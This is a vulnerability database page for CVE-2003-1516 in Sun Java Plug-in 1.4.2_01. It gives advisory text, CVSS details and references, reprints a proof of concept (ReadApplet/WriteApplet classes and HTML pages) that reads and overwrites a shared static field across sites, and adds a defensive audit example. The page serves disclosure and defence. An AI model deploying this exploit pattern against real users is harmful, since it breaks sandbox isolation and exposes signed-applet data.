CVE-2003-1516
CVSS 6.8
Published: 2003-12-31 00:00:00
Last modified: 2008-09-05 16:37:08

[Original] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.


[CNNVD] Sun Java Cross-Site Applet Sandbox Security Model Violation Vulnerability (CNNVD-200312-166)

        
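        Sun Java 2 SDK is a Java platform implementation.
        A vulnerability in Sun's Java implementation allows Java applets to violate the sandbox security model and gain read/write access to data in a different domain.
        Cross-site applets from different sites can share data areas through undocumented JDK static variables. When these variables are modified, the JDK's internal state is corrupted and some functionality stops working correctly. In particular, when XML processing relies on the org.apache.xalan.processor.XSLProcessorVersion class, the result is a violation of the sandbox security model that lets unsigned applets gain unauthorized access to data used by signed applets.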
        

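- CVSS (Base Score)

CVSS score: 6.8 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: MEDIUM [exploitation requires certain access conditions]
Attack vector: NETWORK [the attacker does not need internal network access or local access]
Authentication: NONE [exploitation requires no authentication]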

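- CPE (Affected Platforms and Products)

Product and version information (CPE) is not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found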

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1516
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1516
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-166
(Official data source) CNNVD

- Other Links and Resources

http://www.securityfocus.com/bid/8857
(UNKNOWN)  BID  8857
http://www.securityfocus.com/archive/1/341815
(UNKNOWN)  BUGTRAQ  20031020 Cross Site Java applets

- Vulnerability Information

Sun Java Cross-Site Applet Sandbox Security Model Violation Vulnerability
Medium risk  Design error
2003-12-31 00:00:00 2003-12-31 00:00:00
Remote
        
        

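- Advisories and Patches

        Vendor patch:
        Sun
        ---
        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version: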
        
        http://sunsolve.sun.com/security

- Vulnerability Information (23265)

Sun Java Plug-In 1.4.2 _01 Cross-Site Applet Sandbox Security Model Violation Vulnerability (EDBID:23265)
windows remote
2003-10-20 Verified
0 Marc Schoenefeld
N/A
source: http://www.securityfocus.com/bid/8857/info

A vulnerability has been reported in Java implementations that may potentially allow Java applets from two different domains to violate the sandbox security model and share read/write access to data areas. This violates the principle of isolation that should be enforced by Java and it is possible for unsigned applets to gain unauthorized access to data used by signed applets.

This issue was reported for Java Plug-in 1.4.2_01 on Microsoft Windows platforms, though it is believed that other platforms are similarly affected. It is not known if other versions or Java implementations are also affected.

Two applets,
- one on siteA: www.siteA.org => Read.html / ReadApplet.class
- one on siteB: www.siteB.org => Write.html / WriteApplet.class

The applet from siteB can share a variable, accessible for both reading and
writing, that is used by siteA. Data protection is therefore not guaranteed:
an unsigned applet may grab data stored in this variable by a signed applet
or interfere with its XML processing, and therefore violates the isolation
restriction of the sandbox.

==========READAPPLET=========================
/* Illegalaccess.org java exploit */
/* coded by Marc Schoenefeld */

import java.awt.Graphics;

public class ReadApplet extends java.applet.Applet {

    // Prints the current value of the shared static field on each repaint.
    public void paint(Graphics g) {
        System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
    }

    // Also prints the value once, when the class is initialized.
    static {
        System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
    }
}
==========READAPPLET=========================

==========WRITEAPPLET=========================
import java.awt.Graphics;

public class WriteApplet extends java.applet.Applet {

    // Appends to the shared static field on each repaint.
    public void paint(Graphics g) {
        org.apache.xalan.processor.XSLProcessorVersion.S_VERSION += "a";
    }

    // Overwrites the shared static field once, when the class is initialized.
    static {
        org.apache.xalan.processor.XSLProcessorVersion.S_VERSION = "altered from SiteA";
    }
}
==========WRITEAPPLET=========================


=========Write.html============================
<HTML>
<BODY BGCOLOR=#66FF66>
<PRE>
WriteApplet, write to variable
Marc (marc@org.illegalaccess)
</PRE>
<applet codebase=. code=WriteApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>

========Read.html=============================
<HTML>
<BODY BGCOLOR=#6666FF>
<PRE>
ReadApplet, read from variable
Marc (marc@org.illegalaccess)
</PRE>
<applet codebase=. code=ReadApplet.class width=100 height=100>
</applet>
</BODY>
</HTML> 		
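
Added example, not part of the original advisory or of the vendor's code: the variable the two applets share is a public static field that is not final, so a defender reviewing library code can list such fields by reflection. The class `MutableStaticAudit`, the stand-in `SharedVersion` and its field values are constructed for illustration; the class names passed on the command line are an assumption left to the reader.

```java
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.ArrayList;
import java.util.List;

public class MutableStaticAudit {

    // Constructed stand-in with the same field shape as S_VERSION in the
    // advisory (public, static, not final), next to hardened variants.
    public static class SharedVersion {
        public static String S_VERSION = "1.0";            // any caller can reassign
        public static final String S_FIXED = "1.0";        // immutable constant
        public static final String[] S_PARTS = {"1", "0"}; // final, but elements are writable
    }

    /** Lists public static fields of c that other code can modify. */
    public static List<String> writableStatics(Class<?> c) {
        List<String> hits = new ArrayList<>();
        for (Field f : c.getFields()) {                    // public fields, inherited included
            int m = f.getModifiers();
            if (!Modifier.isStatic(m)) {
                continue;
            }
            if (!Modifier.isFinal(m)) {
                hits.add(f.getName() + " (reassignable)");
            } else if (f.getType().isArray()) {
                hits.add(f.getName() + " (final array, elements writable)");
            }
        }
        return hits;
    }

    public static void main(String[] args) throws ClassNotFoundException {
        System.out.println(SharedVersion.class.getName() + ": "
                + writableStatics(SharedVersion.class));
        ClassLoader cl = MutableStaticAudit.class.getClassLoader();
        for (String name : args) {
            // initialize=false: inspect the class without running its static initializers
            Class<?> c = Class.forName(name, false, cl);
            System.out.println(name + ": " + writableStatics(c));
        }
    }
}
```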

- Vulnerability Information

60412
Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
Local / Remote, Context Dependent
Loss of Integrity

- Vulnerability Description

Unknown or Incomplete

- Timeline

2003-10-20 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability Author

Unknown or Incomplete
 

 
